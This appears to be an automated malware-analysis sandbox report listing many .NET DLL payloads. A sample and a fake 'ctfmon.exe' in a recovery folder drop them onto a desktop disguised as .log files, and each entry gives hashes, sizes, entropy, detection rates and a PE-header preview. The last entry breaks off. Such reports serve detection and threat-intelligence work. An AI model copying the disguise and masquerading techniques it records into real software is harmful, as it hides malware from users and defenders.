                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\WbWKDcuD.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):28160
                                                  Entropy (8bit):5.570953308352568
                                                  Encrypted:false
                                                  SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                  MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                  SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                  SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                  SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\WuNaeyse.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):38400
                                                  Entropy (8bit):5.699005826018714
                                                  Encrypted:false
                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                  MD5:87765D141228784AE91334BAE25AD743
                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\XYySZcJy.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\ZJdigpUr.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\ZRNAKZux.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\akEQlvtX.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):89600
                                                  Entropy (8bit):5.905167202474779
                                                  Encrypted:false
                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                  C:\Users\user\Desktop\cExRVzrV.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):294912
                                                  Entropy (8bit):6.010605469502259
                                                  Encrypted:false
                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 11%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                  C:\Users\user\Desktop\cLPQBZYm.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\dzUZnmUk.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.529329139831718
                                                  Encrypted:false
                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\eWmRCrDn.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\fKqanEzl.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):5.645950918301459
                                                  Encrypted:false
                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\gdhqOayL.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):38912
                                                  Entropy (8bit):5.679286635687991
                                                  Encrypted:false
                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\haIyjaMG.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):34816
                                                  Entropy (8bit):5.636032516496583
                                                  Encrypted:false
                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\hyuiZSvj.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                  C:\Users\user\Desktop\iMcIJnEg.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):39936
                                                  Entropy (8bit):5.660491370279985
                                                  Encrypted:false
                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                  MD5:240E98D38E0B679F055470167D247022
                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\jAgQuBAe.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):89600
                                                  Entropy (8bit):5.905167202474779
                                                  Encrypted:false
                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                  C:\Users\user\Desktop\jswyQSZZ.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\kiFHFtHC.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):24576
                                                  Entropy (8bit):5.535426842040921
                                                  Encrypted:false
                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\lQyoqXNz.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):50176
                                                  Entropy (8bit):5.723168999026349
                                                  Encrypted:false
                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\nbVprpsA.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):28160
                                                  Entropy (8bit):5.570953308352568
                                                  Encrypted:false
                                                  SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                  MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                  SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                  SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                  SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\oPZxcDoy.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
